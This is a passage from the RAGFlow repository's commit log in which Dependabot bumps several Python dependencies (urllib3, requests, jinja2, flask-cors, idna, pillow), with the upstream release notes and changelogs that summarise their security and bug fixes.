of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:16 +08:00
bbf9d6d786 build(deps): bump urllib3 from 2.2.1 to 2.2.2 (#1672)
Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.2.1 to 2.2.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/urllib3/urllib3/releases">urllib3's
releases</a>.</em></p>
<blockquote>
<h2>2.2.2</h2>
<h2>🚀 urllib3 is fundraising for HTTP/2 support</h2>
<p><a
href="https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support">urllib3
is raising ~$40,000 USD</a> to release HTTP/2 support and ensure
long-term sustainable maintenance of the project after a sharp decline
in financial support for 2023. If your company or organization uses
Python and would benefit from HTTP/2 support in Requests, pip, cloud
SDKs, and thousands of other projects <a
href="https://opencollective.com/urllib3">please consider contributing
financially</a> to ensure HTTP/2 support is developed sustainably and
maintained for the long-haul.</p>
<p>Thank you for your support.</p>
<h2>Changes</h2>
<ul>
<li>Added the <code>Proxy-Authorization</code> header to the list of
headers to strip from requests when redirecting to a different host. As
before, different headers can be set via
<code>Retry.remove_headers_on_redirect</code>.</li>
<li>Allowed passing negative integers as <code>amt</code> to read
methods of <code>http.client.HTTPResponse</code> as an alternative to
<code>None</code>. (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3122">#3122</a>)</li>
<li>Fixed return types representing copying actions to use
<code>typing.Self</code>. (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3363">#3363</a>)</li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2">https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/urllib3/urllib3/blob/main/CHANGES.rst">urllib3's
changelog</a>.</em></p>
<blockquote>
<h1>2.2.2 (2024-06-17)</h1>
<ul>
<li>Added the <code>Proxy-Authorization</code> header to the list of
headers to strip from requests when redirecting to a different host. As
before, different headers can be set via
<code>Retry.remove_headers_on_redirect</code>.</li>
<li>Allowed passing negative integers as <code>amt</code> to read
methods of <code>http.client.HTTPResponse</code> as an alternative to
<code>None</code>.
(<code>[#3122](https://github.com/urllib3/urllib3/issues/3122)
&lt;https://github.com/urllib3/urllib3/issues/3122&gt;</code>__)</li>
<li>Fixed return types representing copying actions to use
<code>typing.Self</code>.
(<code>[#3363](https://github.com/urllib3/urllib3/issues/3363)
&lt;https://github.com/urllib3/urllib3/issues/3363&gt;</code>__)</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="27e2a5c5a7"><code>27e2a5c</code></a>
Release 2.2.2 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3406">#3406</a>)</li>
<li><a
href="accff72ecc"><code>accff72</code></a>
Merge pull request from GHSA-34jh-p97f-mpxf</li>
<li><a
href="34be4a57e5"><code>34be4a5</code></a>
Pin CFFI to a new release candidate instead of a Git commit (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3398">#3398</a>)</li>
<li><a
href="da410581b6"><code>da41058</code></a>
Bump browser-actions/setup-chrome from 1.6.0 to 1.7.1 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3399">#3399</a>)</li>
<li><a
href="b07a669bd9"><code>b07a669</code></a>
Bump github/codeql-action from 2.13.4 to 3.25.6 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3396">#3396</a>)</li>
<li><a
href="b8589ec9f8"><code>b8589ec</code></a>
Measure coverage with v4 of artifact actions (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3394">#3394</a>)</li>
<li><a
href="f3bdc55851"><code>f3bdc55</code></a>
Allow triggering CI manually (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3391">#3391</a>)</li>
<li><a
href="52392654b3"><code>5239265</code></a>
Fix HTTP version in debug log (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3316">#3316</a>)</li>
<li><a
href="b34619f94e"><code>b34619f</code></a>
Bump actions/checkout to 4.1.4 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3387">#3387</a>)</li>
<li><a
href="9961d14de7"><code>9961d14</code></a>
Bump browser-actions/setup-chrome from 1.5.0 to 1.6.0 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3386">#3386</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=urllib3&package-manager=pip&previous-version=2.2.1&new-version=2.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:04 +08:00
8c2b91d3db build(deps): bump requests from 2.31.0 to 2.32.2 (#1673)
Bumps [requests](https://github.com/psf/requests) from 2.31.0 to 2.32.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/psf/requests/releases">requests's
releases</a>.</em></p>
<blockquote>
<h2>v2.32.2</h2>
<h2>2.32.2 (2024-05-21)</h2>
<p><strong>Deprecations</strong></p>
<ul>
<li>
<p>To provide a more stable migration for custom HTTPAdapters impacted
by the CVE changes in 2.32.0, we've renamed <code>_get_connection</code>
to
a new public API, <code>get_connection_with_tls_context</code>. Existing
custom
HTTPAdapters will need to migrate their code to use this new API.
<code>get_connection</code> is considered deprecated in all versions of
Requests&gt;=2.32.0.</p>
<p>A minimal (2-line) example has been provided in the linked PR to ease
migration, but we strongly urge users to evaluate if their custom
adapter
is subject to the same issue described in CVE-2024-35195. (<a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>)</p>
</li>
</ul>
<h2>v2.32.1</h2>
<h2>2.32.1 (2024-05-20)</h2>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Add missing test certs to the sdist distributed on PyPI.</li>
</ul>
<h2>v2.32.0</h2>
<h2>2.32.0 (2024-05-20)</h2>
<h2>🐍 PYCON US 2024 EDITION 🐍</h2>
<p><strong>Security</strong></p>
<ul>
<li>Fixed an issue where setting <code>verify=False</code> on the first
request from a
Session will cause subsequent requests to the <em>same origin</em> to
also ignore
cert verification, regardless of the value of <code>verify</code>.
(<a
href="https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56">https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56</a>)</li>
</ul>
<p><strong>Improvements</strong></p>
<ul>
<li><code>verify=True</code> now reuses a global SSLContext which should
improve
request time variance between first and subsequent requests. It should
also minimize certificate load time on Windows systems when using a
Python
version built with OpenSSL 3.x. (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li>Requests now supports optional use of character detection
(<code>chardet</code> or <code>charset_normalizer</code>) when
repackaged or vendored.
This enables <code>pip</code> and other projects to minimize their
vendoring
surface area. The <code>Response.text()</code> and
<code>apparent_encoding</code> APIs
will default to <code>utf-8</code> if neither library is present. (<a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>)</li>
</ul>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Fixed bug in length detection where emoji length was incorrectly
calculated in the request content-length. (<a
href="https://redirect.github.com/psf/requests/issues/6589">#6589</a>)</li>
<li>Fixed deserialization bug in JSONDecodeError. (<a
href="https://redirect.github.com/psf/requests/issues/6629">#6629</a>)</li>
<li>Fixed bug where an extra leading <code>/</code> (path separator)
could lead
urllib3 to unnecessarily reparse the request URI. (<a
href="https://redirect.github.com/psf/requests/issues/6644">#6644</a>)</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/psf/requests/blob/main/HISTORY.md">requests's
changelog</a>.</em></p>
<blockquote>
<h2>2.32.2 (2024-05-21)</h2>
<p><strong>Deprecations</strong></p>
<ul>
<li>
<p>To provide a more stable migration for custom HTTPAdapters impacted
by the CVE changes in 2.32.0, we've renamed <code>_get_connection</code>
to
a new public API, <code>get_connection_with_tls_context</code>. Existing
custom
HTTPAdapters will need to migrate their code to use this new API.
<code>get_connection</code> is considered deprecated in all versions of
Requests&gt;=2.32.0.</p>
<p>A minimal (2-line) example has been provided in the linked PR to ease
migration, but we strongly urge users to evaluate if their custom
adapter
is subject to the same issue described in CVE-2024-35195. (<a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>)</p>
</li>
</ul>
<h2>2.32.1 (2024-05-20)</h2>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Add missing test certs to the sdist distributed on PyPI.</li>
</ul>
<h2>2.32.0 (2024-05-20)</h2>
<p><strong>Security</strong></p>
<ul>
<li>Fixed an issue where setting <code>verify=False</code> on the first
request from a
Session will cause subsequent requests to the <em>same origin</em> to
also ignore
cert verification, regardless of the value of <code>verify</code>.
(<a
href="https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56">https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56</a>)</li>
</ul>
<p><strong>Improvements</strong></p>
<ul>
<li><code>verify=True</code> now reuses a global SSLContext which should
improve
request time variance between first and subsequent requests. It should
also minimize certificate load time on Windows systems when using a
Python
version built with OpenSSL 3.x. (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li>Requests now supports optional use of character detection
(<code>chardet</code> or <code>charset_normalizer</code>) when
repackaged or vendored.
This enables <code>pip</code> and other projects to minimize their
vendoring
surface area. The <code>Response.text()</code> and
<code>apparent_encoding</code> APIs
will default to <code>utf-8</code> if neither library is present. (<a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>)</li>
</ul>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Fixed bug in length detection where emoji length was incorrectly
calculated in the request content-length. (<a
href="https://redirect.github.com/psf/requests/issues/6589">#6589</a>)</li>
<li>Fixed deserialization bug in JSONDecodeError. (<a
href="https://redirect.github.com/psf/requests/issues/6629">#6629</a>)</li>
<li>Fixed bug where an extra leading <code>/</code> (path separator)
could lead
urllib3 to unnecessarily reparse the request URI. (<a
href="https://redirect.github.com/psf/requests/issues/6644">#6644</a>)</li>
</ul>
<p><strong>Deprecations</strong></p>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="88dce9d854"><code>88dce9d</code></a>
v2.32.2</li>
<li><a
href="c98e4d133e"><code>c98e4d1</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>
from nateprewitt/api_rename</li>
<li><a
href="92075b330a"><code>92075b3</code></a>
Add deprecation warning</li>
<li><a
href="aa1461b68a"><code>aa1461b</code></a>
Move _get_connection to get_connection_with_tls_context</li>
<li><a
href="970e8cec98"><code>970e8ce</code></a>
v2.32.1</li>
<li><a
href="d6ebc4a2f1"><code>d6ebc4a</code></a>
v2.32.0</li>
<li><a
href="9a40d12778"><code>9a40d12</code></a>
Avoid reloading root certificates to improve concurrent performance (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li><a
href="0c030f78d2"><code>0c030f7</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>
from nateprewitt/no_char_detection</li>
<li><a
href="555b870eb1"><code>555b870</code></a>
Allow character detection dependencies to be optional in post-packaging
steps</li>
<li><a
href="d6dded3f00"><code>d6dded3</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6700">#6700</a>
from franekmagiera/update-redirect-to-invalid-uri-test</li>
<li>Additional commits viewable in <a
href="https://github.com/psf/requests/compare/v2.31.0...v2.32.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=requests&package-manager=pip&previous-version=2.31.0&new-version=2.32.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:48 +08:00
55028b2db7 build(deps): bump jinja2 from 3.1.3 to 3.1.4 (#1674)
[//]: # (dependabot-start)
⚠️  **Dependabot is rebasing this PR** ⚠️ 

Rebasing might not happen immediately, so don't worry if this takes some
time.

Note: if you make any changes to this PR yourself, they will take
precedence over the rebase.

---

[//]: # (dependabot-end)

Bumps [jinja2](https://github.com/pallets/jinja) from 3.1.3 to 3.1.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/jinja/releases">jinja2's
releases</a>.</em></p>
<blockquote>
<h2>3.1.4</h2>
<p>This is the Jinja 3.1.4 security release, which fixes security issues
and bugs but does not otherwise change behavior and should not result in
breaking changes.</p>
<p>PyPI: <a
href="https://pypi.org/project/Jinja2/3.1.4/">https://pypi.org/project/Jinja2/3.1.4/</a>
Changes: <a
href="https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4">https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4</a></p>
<ul>
<li>The <code>xmlattr</code> filter does not allow keys with
<code>/</code> solidus, <code>&gt;</code> greater-than sign, or
<code>=</code> equals sign, in addition to disallowing spaces.
Regardless of any validation done by Jinja, user input should never be
used as keys to this filter, or must be separately validated first.
GHSA-h75v-3vvj-5mfj</li>
</ul>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/jinja/blob/main/CHANGES.rst">jinja2's
changelog</a>.</em></p>
<blockquote>
<h2>Version 3.1.4</h2>
<p>Released 2024-05-05</p>
<ul>
<li>The <code>xmlattr</code> filter does not allow keys with
<code>/</code> solidus, <code>&gt;</code>
greater-than sign, or <code>=</code> equals sign, in addition to
disallowing spaces.
Regardless of any validation done by Jinja, user input should never be
used
as keys to this filter, or must be separately validated first.
:ghsa:<code>h75v-3vvj-5mfj</code></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="dd4a8b5466"><code>dd4a8b5</code></a>
release version 3.1.4</li>
<li><a
href="0668239dc6"><code>0668239</code></a>
Merge pull request from GHSA-h75v-3vvj-5mfj</li>
<li><a
href="d655030770"><code>d655030</code></a>
disallow invalid characters in keys to xmlattr filter</li>
<li><a
href="a7863ba9d3"><code>a7863ba</code></a>
add ghsa links</li>
<li><a
href="b5c98e78c2"><code>b5c98e7</code></a>
start version 3.1.4</li>
<li><a
href="da3a9f0b80"><code>da3a9f0</code></a>
update project files (<a
href="https://redirect.github.com/pallets/jinja/issues/1968">#1968</a>)</li>
<li><a
href="0ee5eb41d1"><code>0ee5eb4</code></a>
satisfy formatter, linter, and strict mypy</li>
<li><a
href="20477c6357"><code>20477c6</code></a>
update project files (<a
href="https://redirect.github.com/pallets/jinja/issues/5457">#5457</a>)</li>
<li><a
href="e491223739"><code>e491223</code></a>
update pyyaml dev dependency</li>
<li><a
href="36f98854c7"><code>36f9885</code></a>
fix pr link</li>
<li>Additional commits viewable in <a
href="https://github.com/pallets/jinja/compare/3.1.3...3.1.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=jinja2&package-manager=pip&previous-version=3.1.3&new-version=3.1.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:22 +08:00
daf86dbf74 build(deps): bump flask-cors from 4.0.0 to 4.0.1 (#1675)
Bumps [flask-cors](https://github.com/corydolphin/flask-cors) from 4.0.0
to 4.0.1.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/corydolphin/flask-cors/releases">flask-cors's
releases</a>.</em></p>
<blockquote>
<h2>4.0.1</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix Read the Docs builds by <a
href="https://github.com/kurtmckee"><code>@​kurtmckee</code></a> in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/345">corydolphin/flask-cors#345</a></li>
<li>Update extension.py to clean request.path before logging it by <a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
<li>Update CI to include Python 3.12 and flask 3.0.3 by <a
href="https://github.com/corydolphin"><code>@​corydolphin</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/354">corydolphin/flask-cors#354</a></li>
<li>Release 4.0.1 by <a
href="https://github.com/corydolphin"><code>@​corydolphin</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/353">corydolphin/flask-cors#353</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/kurtmckee"><code>@​kurtmckee</code></a>
made their first contribution in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/345">corydolphin/flask-cors#345</a></li>
<li><a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a>
made their first contribution in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1">https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/corydolphin/flask-cors/blob/main/CHANGELOG.md">flask-cors's
changelog</a>.</em></p>
<blockquote>
<h2>4.0.1</h2>
<h3>Security</h3>
<ul>
<li>Address <a
href="https://github.com/advisories/GHSA-84pr-m4jr-85g5">CVE-2024-1681</a>
which is a log injection vulnerability when the log level is set to
debug by <a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="1df178ccc0"><code>1df178c</code></a>
Release 0.4.1 (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/353">#353</a>)</li>
<li><a
href="5090b4a43f"><code>5090b4a</code></a>
Update CI to include Python 3.12 and flask 3.0.3 (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/354">#354</a>)</li>
<li><a
href="6172c2000d"><code>6172c20</code></a>
Update extension.py to clean request.path before logging it (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/351">#351</a>)</li>
<li><a
href="cadade9403"><code>cadade9</code></a>
Fix Read the Docs builds (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/345">#345</a>)</li>
<li>See full diff in <a
href="https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=flask-cors&package-manager=pip&previous-version=4.0.0&new-version=4.0.1)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:04 +08:00
b2ef6a05a1 build(deps): bump idna from 3.6 to 3.7 (#1676)
Bumps [idna](https://github.com/kjd/idna) from 3.6 to 3.7.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/kjd/idna/releases">idna's
releases</a>.</em></p>
<blockquote>
<h2>v3.7</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix issue where specially crafted inputs to encode() could take
exceptionally long amount of time to process. [CVE-2024-3651]</li>
</ul>
<p>Thanks to Guido Vranken for reporting the issue.</p>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/kjd/idna/compare/v3.6...v3.7">https://github.com/kjd/idna/compare/v3.6...v3.7</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/kjd/idna/blob/master/HISTORY.rst">idna's
changelog</a>.</em></p>
<blockquote>
<p>3.7 (2024-04-11)
++++++++++++++++</p>
<ul>
<li>Fix issue where specially crafted inputs to encode() could
take exceptionally long amount of time to process. [CVE-2024-3651]</li>
</ul>
<p>Thanks to Guido Vranken for reporting the issue.</p>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="1d365e17e1"><code>1d365e1</code></a>
Release v3.7</li>
<li><a
href="c1b3154939"><code>c1b3154</code></a>
Merge pull request <a
href="https://redirect.github.com/kjd/idna/issues/172">#172</a> from
kjd/optimize-contextj</li>
<li><a
href="0394ec76ff"><code>0394ec7</code></a>
Merge branch 'master' into optimize-contextj</li>
<li><a
href="cd58a23173"><code>cd58a23</code></a>
Merge pull request <a
href="https://redirect.github.com/kjd/idna/issues/152">#152</a> from
elliotwutingfeng/dev</li>
<li><a
href="5beb28b9dd"><code>5beb28b</code></a>
More efficient resolution of joiner contexts</li>
<li><a
href="1b121483ed"><code>1b12148</code></a>
Update ossf/scorecard-action to v2.3.1</li>
<li><a
href="d516b874c3"><code>d516b87</code></a>
Update Github actions/checkout to v4</li>
<li><a
href="c095c75943"><code>c095c75</code></a>
Merge branch 'master' into dev</li>
<li><a
href="60a0a4cb61"><code>60a0a4c</code></a>
Fix typo in GitHub Actions workflow key</li>
<li><a
href="5918a0ef80"><code>5918a0e</code></a>
Merge branch 'master' into dev</li>
<li>Additional commits viewable in <a
href="https://github.com/kjd/idna/compare/v3.6...v3.7">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=idna&package-manager=pip&previous-version=3.6&new-version=3.7)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:07:45 +08:00
6bc3a2d58a build(deps): bump pillow from 10.2.0 to 10.3.0 (#1677)
Bumps [pillow](https://github.com/python-pillow/Pillow) from 10.2.0 to
10.3.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/python-pillow/Pillow/releases">pillow's
releases</a>.</em></p>
<blockquote>
<h2>10.3.0</h2>
<p><a
href="https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html">https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html</a></p>
<h2>Changes</h2>
<ul>
<li>CVE-2024-28219: Use strncpy to avoid buffer overflow <a
